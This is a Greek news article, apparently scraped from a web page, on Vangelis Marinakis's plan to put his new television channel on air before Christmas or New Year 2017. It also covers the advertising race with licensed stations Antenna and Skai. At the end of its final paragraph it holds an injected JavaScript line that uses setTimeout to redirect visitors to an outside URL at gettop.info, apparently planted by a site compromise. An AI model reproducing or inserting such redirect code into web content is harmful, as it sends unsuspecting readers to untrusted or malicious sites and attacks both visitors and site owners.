Στόχος του Βαγγέλη Μαρινάκη να εκπέμψει το νέο κανάλι πριν από τα Χριστούγεννα

0
14

 

Ταχύτατα κινείται ο Βαγγέλης Μαρινάκης για τη δημιουργία του τηλεοπτικού σταθμού του, έχοντας συγκεκριμένο χρονοδιάγραμμα για την πρεμιέρα του.

Άνθρωποι που βρίσκονται κοντά του τονίζουν ότι στόχος είναι να βρίσκεται στον «αέρα» το νέο κανάλι πριν από τα Χριστούγεννα ή (το αργότερο) την πρωτοχρονιά του 2017. Επιμένουν δε ότι όλα θα γίνουν από την αρχή, χωρίς να επιδιωχθεί συνεργασία με κάποιους από τους εν λειτουργία σταθμούς.

Το τελευταίο σχόλιο αναφέρεται στα σενάρια που κυκλοφόρησαν μετά τη συνάντηση του προέδρου του Ολυμπιακού με τον ιδιοκτήτη του ΔΟΛ και πρόεδρο του Μega, Σταύρο Ψυχάρη. Είναι αλήθεια ότι ο νέος «καναλάρχης» θα ήθελε τη βιβλιοθήκη των σήριαλ του σταθμού, ωστόσο κάτι τέτοιο θα ήταν πολύ δύσκολο να συμφωνηθεί -λόγω του γεγονότος ότι οι τράπεζες κρατούν ως ενέχυρο τις μετοχές του Σταύρου Ψυχάρη και του Φώτη Μπόμπολα.

Ας μη ξεχνάμε ότι οι δυο από τους τέσσερις σταθμούς που εξασφάλισαν άδεια (Αντέννα και Σκάι) λειτουργούν κανονικά -συνεπώς, παίρνουν διαφήμιση. Όσο καθυστερούν δε να οργανωθούν τα κανάλια Μαρινάκη και Καλογρίτσα, τόσο μεγαλύτερο κομμάτι της διαφημιστικής πίτας θα διεκδικούν.

Συνεπώς, είναι απολύτως λογικό να βιάζονται οι νέοι «αδειούχοι». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here